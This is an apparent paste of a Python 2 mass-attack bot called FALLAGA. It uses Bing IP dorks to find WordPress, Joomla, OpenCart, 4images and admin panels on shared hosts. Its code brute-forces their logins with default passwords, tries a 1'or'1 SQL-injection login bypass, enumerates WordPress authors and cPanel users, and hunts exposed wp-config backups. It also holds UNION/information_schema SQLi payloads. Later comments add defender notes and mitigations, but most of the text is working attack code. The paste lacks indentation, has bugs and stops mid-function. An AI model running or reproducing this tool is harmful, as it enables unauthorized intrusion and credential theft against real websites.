CLAYTeaM

bot

Jul 5th, 2016
  1. # -*- coding: utf-8 -*-
  2. '''
  3. FALLAGA Is A Brute Force Bot - Speed Brute Force Attack - Mass Attack - Auto Grabber
  4. You May Change somethings In the Config Zone
  5. Types Of Brute :
  6. 1 ) Wordpress Attack + Auto Grab Username
  7. 2 ) Joomla ! Attack
  8. 3 ) Admin Panel ( All Scripts ) : Attack
  9. 4 ) Anything -_-
  10. 5 ) Open Cart Cms
  11. 7 ) 4images Attacker
  12. 8 ) Check Sqli Vulnerabilities
  13. 9 ) Check Upload Vulnerabilities
  14. 10 ) Grab Users
  15. '''
  16. #!/usr/bin/python
  17. #~~~~~~~~~~~~
  18. #Import Zone
  19. #--
  20. try :
  21. import mechanize
  22. except :
  23. print " |- Please Install Mechanize First !"
  24. #--
  25. import urllib
  26. import urllib2
  27. import httplib
  28. import cookielib
  29. import re
  30. import requests as xsec
  31. from time import sleep
  32. from threading import Thread
  33. import socket
  34. from ftplib import FTP
  35. #~~~~~~~~~~~~
  36. #~Variables And Lists
  37. jcelist = []
  38. bad = [404,403,401,501,406,400,500,301,302]
  39. jolist = []
  40. wplist = []
  41. adlist = []
  42. pmalist = []
  43. oclist = []
  44. fourilist = []
  45. sqlilist = []
  46. upllist = []
  47. users = []
  48. cpusers = []
  49. dachlist = []
  50. sites = []
  51. FCKeditor = []
  52. adsite = []
  53. wpconfigbak = []
  54. urls = []
  55. passwords = ["admin","123123","1234"]
  56. passlist = ["admin"]
  57. #------------------------------------------------------------
  # Fixed request paths and marker strings used by the scanning stages below.
  # Defender note: every entry here is a literal URL path or query string, so
  # each one is a ready-made search term for web access logs and a candidate
  # for a deny rule at the web server or WAF.
  #
  # joexploits / com_media_inj: Joomla component URLs. com_media_inj is
  # requested by check(); the JCE path is hard-coded again in jce_checker().
  58. joexploits = ['/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20']
  59. com_media_inj = "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=7"
  60. #------------------------------------------------------------
  # Leftover-configuration candidates: ".inc" includes, ".bak" copies and
  # editor "~" backups. grabconfinc(), grabconfigbak(), grabconfigsym() and
  # grabconfigwp() request each path on every collected site and report the
  # ones that answer HTTP 200.
  # Mitigation: keep backup and include copies of configuration files out of
  # the web root, and refuse to serve *.bak, *.inc and *~ files.
  61. configsinc= ["/config.php.inc","/config.inc","/includes/config.php.inc","/includes/config.inc","/includes/db.inc","/includes/db.php.inc","/admin/includes/config.inc.php"]
  62. configsbak= ["/config.php.bak","/config.bak","/includes/config.php.bak","/includes/config.bak","/includes/db.bak","/includes/db.php.bak","/admin/includes/config.inc.php.bak","/db/db.php.bak","/db/config.php.bak"]
  63. configsbaksym= ["/config.php~","/config~","/includes/config.php~","/includes/config~","/includes/db~","/includes/db.php~","/admin/includes/config.inc.php~","/db/db.php~","/db/config.php~"]
  64. wpbackup = ["/wp-config.php.bak","wp-config.php~","wp-config.php_bak","/wp-config.php-bak"]
  # Directory names requested by grabuploadedlink(); a 200 response is
  # reported as a found upload directory.
  65. dirs = ["/upload/","/uploads/","/documents/","/files/","/resume/","/resumes","/files/","/upload_cv/","/cv_upload/","/pictures/","/hpage/","/files/upload/","/files/uploads/","/upload/files/"]
  # jot: Joomla path -> component name. scanjoomla() reports a hit when the
  # path answers 200 and the component name appears in the response body.
  66. jot = {'/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1': 'com_fabrik' ,
  67. '/index.php?option=com_jvehicles&task=agentlisting&aid=31337': 'com_Jvehicles',
  68. '/index.php?option=com_virtuemart' : 'com_virtuemart',
  69. '/index.php?option=com_kunena' : 'com_kunena'
  70. }
  # wpt: WordPress path -> display label. scanwp() reports a hit on HTTP 200
  # alone, so it is an inventory of what is installed, not proof of a flaw.
  # Mitigation: remove unused plugins and themes and keep the rest patched.
  71. wpt = {"/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php" : "Creative Contact Form",
  72. "/wp-content/uploads/slideshow-gallery/" : "slideshow gallery",
  73. "/wp-content/uploads/feuGT_uploads/" : "feuGT",
  74. "/themes/dandelion/functions/upload-handler.php" : "dandelion"
  75. }
  76. #---------------------------
  # State and SQL fragments for the SQL-injection stage.
  # error: substrings that getsqlicol() searches for in response bodies. The
  # technique depends on database error text reaching the client, so generic
  # error pages remove the signal it relies on.
  77. error = ["Unknown","SQL","sql"]
  # Result accumulators filled by grabtab(), grabcol(), grabdata() and
  # dumpcol() respectively, then printed by the show*() helpers.
  78. admins = []
  79. columns = []
  80. db = []
  81. dumps = []
  # The hex literals decode to the ASCII strings '<font color="yassinox">' and
  # '</font>', an HTML wrapper placed around the selected value.
  # Defender note: "group_concat(0x3c666f6e74", "union+select" and
  # "information_schema" inside a URL parameter are high-signal patterns for
  # WAF rules and log searches. The underlying fix is parameterized queries and
  # a database account without access beyond the application's own tables.
  82. payload_db = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,database(),0x3c2f666f6e743e)"
  83. payload_tab = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)"
  84. final_tab = "+from+information_schema.tables+where+table_schema =database()--"
  85. payload_col = "group_concat(column_name)"
  86. final_col = "+from+information_schema.columns+where+table_schema=database()--"
  87. #------------------------------------------------------------
  88. ips = open("ip.txt","r")
  89. #~~~~~~~~~~~~
  90. #~Config Zone
  91. excpl = False #~extract cpanel users To list
  92. attackfio = True #~Brute force 4images
  93. #~~~~~~~~~~~~
  94. class bcolors:
  95. HEADER = '\033[95m'
  96. OKBLUE = '\033[94m'
  97. OKGREEN = '\033[92m'
  98. WARNING = '\033[93m'
  99. FAIL = '\033[91m'
  100. ENDC = '\033[0m'
  101. CYAN = '\033[96m'
  102. class colors():
  103. PURPLE = '\033[95m'
  104. CYAN = '\033[96m'
  105. DARKCYAN = '\033[36m'
  106. BLUE = '\033[94m'
  107. GREEN = '\033[92m'
  108. YELLOW = '\033[93m'
  109. RED = '\033[91m'
  110. BOLD = '\033[1m'
  111. ENDC = '\033[0m'
  112. #~~~~~~~~~~~~~
  113. def logo():
  114. print bcolors.CYAN+ ''' _
  115.  
  116.  
  117.  
  118. _____ _ _ ______ ____
  119. |_ _| | | | ____| _ \
  120. | | | |__| | |__ | |_) |
  121. | | | __ | __| | _ <
  122. _| |_| | | | |____| |_) |
  123. |_____|_| |_|______|____/
  124.  
  125.  
  126.  
  127.  
  128.  
  129. Private Version
  130. Python B0xT
  131.  
  132.  
  133. '''
  134. logo()
  135. #~~~~~~~~~~~~~
  # Return the items of seq with duplicates removed, keeping first-seen order.
  # set.add() returns None, so "seen.add(x) or x" records x and yields x in a
  # single expression. Items must be hashable.
  136. def unique(seq):
  137. seen = set()
  138. return [seen.add(x) or x for x in seq if x not in seen]
  139. #~~~~~~~~~~~~~
  140. def grabjo(ip):
  141. print bcolors.OKBLUE + "|- Grabbing Joomla "
  142. page = 1
  143. while page <= 21:
  144. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+index.php?option=com&count=50&first="+str(page)
  145. openbing = urllib2.urlopen(bing)
  146. readbing = openbing.read()
  147. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  148. for i in range(len(findwebs)):
  149. jmnoclean = findwebs[i]
  150. findjm = re.findall('(.*?)index.php', jmnoclean)
  151. jolist.extend(findjm)
  152.  
  153. page = page + 10
  154. print bcolors.OKGREEN + "|- Grabbed : " + str(len(jolist)) + " Joomla Sites "
  155. #~~~~~~~~~~~~~
  # Build the global wplist of candidate WordPress base URLs for one IP.
  # NOTE(review): the paste has lost its indentation, so the nesting described
  # here is inferred from the statements, not shown.
  # It queries Bing with "ip:<address> ?page_id=" at result offsets 1, 11 and
  # 21, takes the href of each '<h2><a href=' result heading, and keeps the
  # part of each URL that precedes "?page_id=".
  # Defender note: this stage talks only to the search engine, so nothing
  # appears in the listed sites' logs yet. On shared hosting, every site that
  # is indexed under the same address becomes a candidate.
  # There is no try/except here, so a failed urlopen() propagates to the caller.
  156. def grabwp(ip):
  157. print bcolors.OKBLUE + "|- Grabbing Wordpress "
  158. page = 1
  159. while page <= 21:
  160. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+?page_id=&count=50&first="+str(page)
  161. openbing = urllib2.urlopen(bing)
  162. readbing = openbing.read()
  163. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  164. for i in range(len(findwebs)):
  165. wpnoclean = findwebs[i]
  166. findwp = re.findall('(.*?)\?page_id=', wpnoclean)
  167. wplist.extend(findwp)
  168. page = page + 10
  169. print bcolors.OKGREEN + "|- Grabbed : " + str(len(wplist)) + " Wordpress Sites "
  170. #~~~~~~~~~~~~~
  # Collect URLs that look like login pages for one IP into the global adlist.
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # Bing is queried with "ip:<address> admin". Every result URL is appended to
  # dachlist, and a URL is fetched and checked for the literal 'type="password"'
  # only while dachlist holds fewer than five entries.
  # The assignment on line 180 has no "global" statement, so it binds a local
  # name and leaves the module-level sites list untouched.
  # Defender note: the only direct contact with a site here is a plain GET of a
  # page that a search engine already indexed. Keeping administrative login
  # pages out of search indexes and behind an allow-list or VPN removes them
  # from this kind of collection.
  # The bare except hides every error, including network failures.
  171. def admingrabber(ip):
  172. try :
  173. print bcolors.OKBLUE + "|- Grabbing Admin Panels "
  174. page = 1
  175. while page <= 21:
  176. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  177. openbing = urllib2.urlopen(bing)
  178. readbing = openbing.read()
  179. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  180. sites = findwebs
  181. for i in sites :
  182. dachlist.append(i)
  183. if len(dachlist) < 5 :
  184. response = urllib2.urlopen(i).read()
  185. admins = re.findall('type="password"',response)
  186. if admins :
  187. adlist.append(i)
  188. page = page + 10
  189. except :
  190. pass
  191. def counta():
  192. seta = unique(adlist)
  193. for admin in seta :
  194. print bcolors.FAIL + "|-> Admin Panel > " + str(admin)
  195. print bcolors.OKGREEN + "|- Grabbed " + str(len(adlist)) + " Admin Panels"
  196. def grabadfs():
  197. sts = unique(sites)
  198. print bcolors.OKBLUE + "|-> Grabbing From sites "
  199. try:
  200. for site in sts :
  201. a=urllib.urlopen(site + "/admin").read()
  202. find = re.findall('type="password"',a)
  203. np = re.findall('name="log"',a)
  204. if find and not np :
  205. print bcolors.FAIL + "|-> admin panel from site > " + str(site) + "/admin/"
  206. adlist.append(str(site) + "/admin/")
  207. except :
  208. pass
  209. #~~~~~~~~~~~~~
  210. def pma(ip):
  211. print bcolors.OKBLUE + "|- GRABBING PHPMYADMIN"
  212. try:
  213. page = 1
  214. while page <= 21:
  215. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+phpmyadmin&count=50&first="+str(page)
  216. openbing = urllib2.urlopen(bing)
  217. readbing = openbing.read()
  218. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  219. sites = findwebs
  220. for i in sites:
  221. response = urllib2.urlopen(i).read()
  222. upl = re.findall('username"',response)
  223. if upl :
  224. pmalist.append(i)
  225. page = page + 10
  226. print bcolors.OKGREEN + "|- Grabbed " + str(len(pmalist)) + " Php My Admin"
  227. except :
  228. pass
  229. #~~~~~~~~~~~~~
  230. def graboc(ip):
  231. print bcolors.WARNING + "|- Grabbing OpenCart"
  232. try:
  233. page = 1
  234. while page <= 21:
  235. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  236. openbing = urllib2.urlopen(bing)
  237. readbing = openbing.read()
  238. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  239. sites = findwebs
  240. for i in sites:
  241. response = urllib2.urlopen(str(i) ).read()
  242. upl = re.findall('>OpenCart<',response)
  243. if upl :
  244. print bcolors.FAIL + "|-> Open Cart > " + str(i)
  245. oclist.append(i)
  246.  
  247. page = page + 10
  248. print bcolors.OKGREEN + "|- Grabbed " + str(len(oclist)) + " Open Cart Sites"
  249. except :
  250. pass
  251. #~~~~~~~~~~~~~
  252. def grabfour(ip):
  253. print bcolors.OKBLUE + "|- Grabbing OpenCart"
  254. lista = []
  255. page = 1
  256. while page <= 21:
  257. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+powered+by+4images&count=50&first="+str(page)
  258. openbing = urllib2.urlopen(bing)
  259. readbing = openbing.read()
  260. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  261. sites = findwebs
  262. for i in sites:
  263. print bcolors.FAIL + "|-> 4images > " + str(i)
  264. a= i.split("index.php", 2)
  265. fourilist.append(a)
  266. page = page + 10
  267. print bcolors.OKGREEN + "|- Grabbed " + str(len(fourilist)) + " 4images Sites"
  268. def grabsqli(ip):
  269. try :
  270. print bcolors.OKBLUE + "|- Grabbing Sqli "
  271. page = 1
  272. while page <= 21:
  273. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+.php?id=&count=50&first="+str(page)
  274. openbing = urllib2.urlopen(bing)
  275. readbing = openbing.read()
  276. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  277. sites = findwebs
  278. for i in sites :
  279. try :
  280. response = urllib2.urlopen(i).read()
  281. checksqli(i)
  282. except urllib2.HTTPError, e:
  283. str(sites).strip(i)
  284.  
  285. page = page + 10
  286. except :
  287. pass
  # Heuristic SQL-injection check for one URL: request it with a single quote
  # appended and record the URL in sqlilist when the response body contains the
  # lower-case substring "sql".
  # Defender note: in access logs this is a request whose last parameter value
  # ends in ' (often logged as %27). The test only works where database error
  # text is returned to the client; parameterized queries and generic error
  # pages remove both the flaw and the signal.
  # Any page that merely mentions "sql" also matches, so results are noisy.
  288. def checksqli(sqli):
  289. responsetwo = urllib2.urlopen(sqli + "'").read()
  290. find = re.findall("sql",responsetwo)
  291. if find:
  292. sqlilist.append(sqli)
  293.  
  294. def count():
  295. set = unique(sqlilist)
  296. for sqli in set :
  297. print bcolors.FAIL + "|-> Sql Injection > " + str(sqli)
  298. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Sql Injection Sites"
  299. #~~~~~~~~~~~~~
  300. def grabupl(ip):
  301. print bcolors.OKBLUE + "|- Grabbing Uplaods"
  302. try:
  303. page = 1
  304. while page <= 21:
  305. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
  306. openbing = urllib2.urlopen(bing)
  307. readbing = openbing.read()
  308. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  309. sites = findwebs
  310. for i in sites:
  311. response = urllib2.urlopen(i).read()
  312. upl = re.findall('type="file"',response)
  313. if upl :
  314. print bcolors.FAIL + "|-> Upload > " + str(i)
  315. upllist.append(i)
  316. page = page + 10
  317. except :
  318. pass
  319. def countu():
  320. set = unique(upllist)
  321. for upl in set :
  322. print bcolors.FAIL + "|-> Upload > " + str(upl)
  323. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Upload Sites"
  324. #~~~~~~~~~~~~~
  325. def grabins(ip):
  326. print bcolors.OKBLUE + "|- Grabbing Install"
  327. try:
  328. for wp in wplist :
  329. a=urllib.urlopen(wp + "/wp-admin/install.php").read()
  330. find = re.findall('type="text"',a)
  331. if find :
  332. print bcolors.FAIL + "|-> Install > " + str(wp) + "/wp-admin/install.php"
  333. except :
  334. pass
  335. #~~~~~~~~~~~~~
  336. def grab(site):
  337. try :
  338. sites.append(site)
  339. site1 = site.replace("http://","")
  340. site2 = site1.replace("www.","")
  341. site3 = site2.replace("/","")
  342. site4 = site3.replace("","")
  343. site5,dach = site4.split(".")
  344. if len(users) < 50 :
  345. users.append(site5)
  346. except :
  347. pass
  348. def extractserver(ip):
  349. try:
  350. page = 1
  351. while page <= 21:
  352. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+&count=50&first="+str(page)
  353. openbing = urllib2.urlopen(bing)
  354. readbing = openbing.read()
  355. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  356. sitess = findwebs
  357. for i in sitess:
  358. sites.append(i)
  359. grab(i)
  360. print bcolors.WARNING + "|-> grabbed " + str(len(sites)) + " sites"
  361. page = page + 21
  362. except :
  363. pass
  364.  
  # Check candidate account names against the host's /cgi-sys/guestbook.cgi.
  # NOTE(review): indentation is lost in this paste; nesting is inferred, and
  # the final print on line 376 presumably belongs to the except branch.
  # For each unique entry in users (filled by grab() from site host names) it
  # requests "http://<ip>/cgi-sys/guestbook.cgi?user=<name>" and treats the
  # name as confirmed when the name appears anywhere in the response body.
  # Confirmed names go into cpusers, which attackftp() later uses as logins.
  # Defender note: a burst of requests to /cgi-sys/guestbook.cgi with a
  # changing user= value from one client is the log signature. Disabling
  # unused legacy CGI scripts and not deriving account names from the domain
  # name both reduce what this step can learn.
  365. def grabcpu(ip):
  366. try :
  367. print bcolors.OKBLUE + "|- Ready To Check " + str(len(users)) + " Users "
  368. for user in unique(users) :
  369. resp = urllib2.urlopen("http://" + ip + '/cgi-sys/guestbook.cgi?user=%s' % user).read()
  370. findcpuser = re.findall(user , resp)
  371. if findcpuser :
  372. print bcolors.FAIL + "|-> Cpanel User > " + user
  373. cpusers.append(user)
  374. except :
  375. pass
  376. print bcolors.FAIL + '|-> Cpanel Not Installed'
  377. def extractcpu():
  378. print bcolors.OKGREEN + "|- Grabbed " + str(len(cpusers)) + " Users"
  379. def extractcpul():
  380. if excpl == False :
  381. for user in cpusers :
  382. with open( 'cpu.txt', 'a') as f:
  383. f.write(user + '\n')
  384. #~~~~~~~~~~~~~
  385. thd = []
  # Enumerate WordPress author names for one site, then hand them to wpbrute().
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # It requests "<site>?author=1" through "?author=5", reads the page <title>,
  # and keeps what the regex on line 396 captures from the start of the title.
  # Errors for an individual id are swallowed. Returns the site argument.
  # Defender note: sequential ?author=N requests from one client are the log
  # signature. Mitigations are to block or redirect author-archive lookups by
  # numeric id, to give accounts a display name and slug that differ from the
  # login name, and to protect the login itself with rate limiting and MFA.
  386. def user(site , passlist):
  387. userlist = list()
  388. i = 1
  389. # you can edit to whatever number of users you want to enumerate
  390. while( i <= 5 ) :
  391. url = site + '?author=%i' % i
  392. try:
  393. data = urllib2.urlopen(url).read()
  394. # cleaning the sh*t
  395. re1 = re.findall("<title>(.*?)</title>" , data)
  396. user = re.search("(.*?) |" , re1[0]).group(1)
  397. userlist.append(user)
  398. except:
  399. pass
  400. i += 1
  401. wpbrute(site , userlist, passlist)
  402. return site
  403. def wpbrute(site , userlist , passlist):
  404. for user in userlist:
  405. # if enumeration returns no user
  406. if user == "" :
  407. userlist[0] = "admin"
  408. del userlist[1:]
  409.  
  410. for user in userlist :
  411. for password in passlist:
  412. try:
  413. # found the answer on stackoverflow
  414. cj = cookielib.CookieJar()
  415. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  416. login_data = urllib.urlencode({'log' : user, 'pwd' : password})
  417. opener.open(str(site) + 'wp-login.php', login_data)
  418. resp = opener.open(str(site)+'wp-admin')
  419. final = resp.read()
  420. if '<li id="wp-admin-bar-logout">' in final:
  421. print bcolors.OKGREEN + '\n|-Wordpress | Cracked ' '\n|-Hostname : ' + str(site) + '\n|-Username: ' + str(user) + ' \n|-Password: '+str(password) + '\n'
  422. break
  423.  
  424. except:
  425. pass
  426. def attackwp():
  427. print bcolors.OKGREEN + "|- Brute Forcing Wordpress "
  428. for wp in wplist :
  429. user(wp , passwords)
  430. #~~~~~~~~~~~~~
  431. def getu(line) :
  432. findu = re.findall('name="(.*?)"' , line)
  433. for i in range(len(findu)):
  434. return findu[i]
  435. def getusername(contentHtml):
  436. global username
  437. for line in contentHtml :
  438. findwebs = re.findall('type="text"' , line)
  439. if findwebs :
  440. username = getu(line)
  441. return username
  442. def getpassword(contentHtml):
  443. global passwordinput
  444. for line in contentHtml :
  445. findwebs = re.findall('type="password"' , line)
  446. if findwebs :
  447. passwordinput = getu(line)
  448. return(passwordinput)
  # Send a classic SQL-injection login string to every URL in adlist.
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # Each URL receives a POST with the fields "username" and "password" both set
  # to 1'or'1, then the same URL is fetched again with the same cookie jar. The
  # attempt is reported as successful when that second response does not
  # contain the text 'type="password'.
  # Defender note: the literal 1'or'1 in a login POST body is an unambiguous
  # signature. The flaw being tested is a login query built by string
  # concatenation; parameterized queries and hashed-password comparison in
  # application code close it. The success test is weak, since any page without
  # a password field counts, so a report from this tool is not proof of access.
  449. def bypasswork():
  450. print bcolors.OKBLUE +"|- Trying To Bypass " + str(len(adlist)) + " Admin Panels "
  451. for ad in adlist:
  452. try:
  453. cj = cookielib.CookieJar()
  454. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  455. login_dat = urllib.urlencode({"username" : "1'or'1", "password" : "1'or'1"})
  456. opener.open(str(ad), login_dat)
  457. response = opener.open(str(ad))
  458. final = response.read()
  459. if 'type="password' in final:
  460. logged = False
  461. else:
  462. print bcolors.OKGREEN + "|- Admin Panel | Bypassed "
  463. print "|- Site -> " + str(ad)
  464. except:
  465. pass
  466.  
  467. def bruteadmin(site,password):
  468. try:
  469. cj = cookielib.CookieJar()
  470. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  471. opener.open(site)
  472. response = opener.open(site)
  473. final = response.readlines()
  474. getusername(final)
  475. getpassword(final)
  476. post = {}
  477. post[username] = "admin"
  478. post[passwordinput] = password
  479. get2 = xsec.post(site, data=urllib.urlencode(post))
  480. get3 = xsec.get(site)
  481. if 'type="password"' in get3.text:
  482. logged = False
  483. else:
  484. print bcolors.OKGREEN + "|- Admin Panel | ATTACKED"
  485. print "|-Site : " + str(site)
  486. print "|-USER : admin"
  487. print "|-Password : " + password
  488.  
  489. except:
  490. print bcolors.FAIL + "|-Fail !"
  491. pass
  492. def brutea():
  493. adlis = unique(adlist)
  494. print bcolors.OKBLUE +"|- Brute Forcing " + str(len(adlis)) + " Admin Panels "
  495. for ad in adlis :
  496. for pwd in passwords :
  497. bruteadmin(ad,pwd)
  498. def inform():
  499. try :
  500. print bcolors.WARNING + "|- Informations "
  501. for ad in adlist :
  502. cj = cookielib.CookieJar()
  503. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  504. opener.open(ad)
  505. response = opener.open(ad)
  506. final = response.readlines()
  507. getusername(final)
  508. getpassword(final)
  509. print bcolors.FAIL + "|-> Host > " + ad
  510. print bcolors.FAIL + "|-> Username Input > " + str(username)
  511. print bcolors.FAIL + "|-> Password Input > " + str(passwordinput)
  512. except :
  513. print bcolors.FAIL + "|->Fail To retrive Data !"
  514. #~~~~~~~~~~~~~
  # Try one password for the fixed login name "admin" against one URL.
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # It POSTs the form fields username=admin and password=<passs> to siteh and
  # reports success when the response body has no 'type="password"' field.
  # All exceptions are swallowed.
  # Defender note: repeated POSTs to one login URL with username "admin" and a
  # changing password are the signature. A non-default administrator name,
  # per-account and per-client throttling or lockout, and MFA on the admin area
  # each defeat a short fixed list like the one in passwords.
  515. def bruteoc(siteh,passs):
  516. try :
  517. cookie_jar = cookielib.CookieJar()
  518. login_form_seq = [
  519. ('username', 'admin'),
  520. ('password', passs)]
  521. login_form_data = urllib.urlencode(login_form_seq)
  522. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  523. site = opener.open(siteh, login_form_data).read()
  524. if re.search('type="password"',site):
  525. logged = False
  526. else :
  527. print (bcolors.OKGREEN + "|- OpenCart HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  528. except :
  529. pass
  530. def attackoc():
  531. for oc in oclist :
  532. for passs in passwords :
  533. bruteoc(oc,passs)
  534. #~~~~~~~~~~~~~
  535. def brutefi(siteh,passs):
  536. try :
  537. cookie_jar = cookielib.CookieJar()
  538. login_form_seq = [
  539. ('loginusername', 'admin'),
  540. ('loginpassword', passs)]
  541. login_form_data = urllib.urlencode(login_form_seq)
  542. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  543. site = opener.open(siteh, login_form_data).read()
  544. if re.search('type="password"',site):
  545. logged = False
  546. else :
  547. print (bcolors.OKGREEN + "|- Four Images HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  548. except :
  549. pass
  550. def attackfi():
  551. for fi in fourilist :
  552. for passs in passwords :
  553. bruteoc(fi,passs)
  554. #~~~~~~~~~~~~~
  555. W = '\033[0m' # white (default)
  556. R = '\033[31m' # red
  557. G = '\033[1;32m' # green bold
  558. O = '\033[33m' # orange
  559. B = '\033[34m' # blue
  560. P = '\033[35m' # purple
  561. C = '\033[36m' # cyan
  562. GR = '\033[37m' # gray
  563. #-------------------------------
  564. def grabuser(victime):
  565. try:
  566. global username
  567. userurl = victime + '?author=1' #~ Get Username By ID
  568. find = urllib2.urlopen(userurl).read()
  569. username = re.search("(.*?) |" , re1[0]).group(1)
  570. except:
  571. username = "admin"
  572. #---------------------------------
  # Try one username/password pair against a WordPress login.
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # It POSTs the fields "log" and "pwd" to <site>/wp-login.php, then requests
  # <site>/wp-admin with the same cookie jar. The attempt is reported as
  # successful when that page contains '<li id="wp-admin-bar-logout">'.
  # All exceptions are swallowed.
  # Defender note: each attempt is a POST to /wp-login.php followed by a GET of
  # /wp-admin from the same client. No User-Agent is set, so the urllib2
  # default is sent. Mitigations are login throttling or lockout, MFA for
  # administrators, and restricting wp-login.php by network where possible.
  573. def bruteforcer(site,username,password):
  574. try :
  575. cj = cookielib.CookieJar()
  576. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  577. login_data = urllib.urlencode({'log' : username, 'pwd' : password})
  578. opener.open(str(site) + '/wp-login.php', login_data)
  579. response = opener.open(str(site)+'/wp-admin')
  580. final = response.read()
  581. if '<li id="wp-admin-bar-logout">' in final:
  582. print C + "|------------------------|"
  583. print C + "| Successfully Attacked "
  584. print C + "| Site : " + str(site)
  585. print C + "| User :" + username
  586. print C + "| Pass :" + password
  587. except :
  588. pass
  589. def attackwp():
  590. print bcolors.OKBLUE + "|- Attack wordpress "
  591. for site in wplist :
  592. for passes in passwords :
  593. grabuser(site)
  594. bruteforcer(site,username,passes)
  595. #----------------------------------------------
  596. def jce_checker(joomla):
  597. comjce = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
  598. try:
  599. html = urllib2.urlopen(joomla + comjce).readlines()
  600. for line in html:
  601. if re.findall('Image Manager', line):
  602.  
  603. jcelist.append(joomla)
  604. except urllib2.URLError:
  605. pass
  606. def startjce():
  607. print bcolors.OKBLUE + "|================ Com Jce ================| "
  608. for joom in jolist :
  609. if "http" in joom :
  610. jce_checker(joom)
  611. for jcesite in unique(jcelist ):
  612. print bcolors.FAIL + "|-> JCE > " + str(jcesite)
  613. print bcolors.OKBLUE + "|================ Com Jce ================| "
  614. #~~~~~~~~~~~~~
  615. def grabconfinc():
  616. print bcolors.OKBLUE + "|- Checking From Config Inc files "
  617. for sit in unique(sites) :
  618. for co in configsinc :
  619. ur = urllib.urlopen(sit + co).getcode()
  620. if ur == 200 :
  621. result = urllib2.urlopen(sit + co).read()
  622. find = re.findall("404",result)
  623. if find :
  624. found = False
  625. else :
  626. print bcolors.FAIL + "|-> Config Inc > " + str(sit + co)
  627. def grabconfigbak():
  628. print bcolors.OKBLUE + "|- Checking From Config backup files"
  629. for sit in unique(sites) :
  630. for co in configsbak :
  631. ur = urllib.urlopen(sit + co).getcode()
  632. if ur == 200 :
  633. result = urllib2.urlopen(sit + co).read()
  634. find = re.findall("404",result)
  635. if find :
  636. found = False
  637. else :
  638. print bcolors.FAIL + "|-> Config backup > " + str(sit + co)
  639. def grabconfigsym():
  640. print bcolors.OKBLUE + "|- Checking From Config backup files (With symbols) "
  641. for sit in unique(sites) :
  642. for co in configsbaksym :
  643. ur = urllib.urlopen(sit + co).getcode()
  644. if ur == 200 :
  645. result = urllib2.urlopen(sit + co).read()
  646. find = re.findall("404",result)
  647. if find :
  648. found = False
  649. else :
  650. print bcolors.FAIL + "|-> Config backup with symbol > " + str(sit + co)
  # Look for readable copies of wp-config.php on every site in wplist.
  # NOTE(review): indentation is lost in this paste; nesting is inferred.
  # For each path in wpbackup it first checks the HTTP status, and on 200
  # downloads the body and looks for the text "DB_USER". Matching URLs are
  # printed and stored in wpconfigbak for grabpasswords().
  # Defender note: requests for wp-config.php.bak, wp-config.php~ and similar
  # names are the log signature. Such copies are served as plain text because
  # the PHP handler does not claim the extension. Remove them from the web root
  # and deny them at the web server. If one was reachable, treat the database
  # credentials and the WordPress secret keys in it as disclosed.
  651. def grabconfigwp():
  652. try :
  653. print bcolors.OKBLUE + "|- Checking From Config backup files (wordpress) "
  654. for sit in unique(wplist) :
  655. for co in wpbackup :
  656. ur = urllib.urlopen(sit + co).getcode()
  657. if ur == 200 :
  658. result = urllib2.urlopen(sit + co).read()
  659. find = re.findall("DB_USER",result)
  660. if find :
  661. print bcolors.FAIL + "|-> Wordpress Config > " + str(sit + co)
  662. wpconfigbak.append(sit + co)
  663. except :
  664. pass
  665. #-----------------------------------------
  666. def showdb():
  667. dbu = unique(db)
  668. for d in dbu :
  669. print "|-> Database > " + str(d)
  670. def showtb():
  671. tbu = unique(admins)
  672. print "+---------------------+"
  673. for t in tbu :
  674. if t == "admin" :
  675. print colors.RED + "| " + str(t)
  676. else :
  677. print colors.GREEN + "| " + str(t)
  678. print "+---------------------+"
  679. def showcl():
  680. cl = unique(columns)
  681. print "+---------------------+"
  682. for c in cl :
  683. c,t = c.split(">")
  684. if c == "password" :
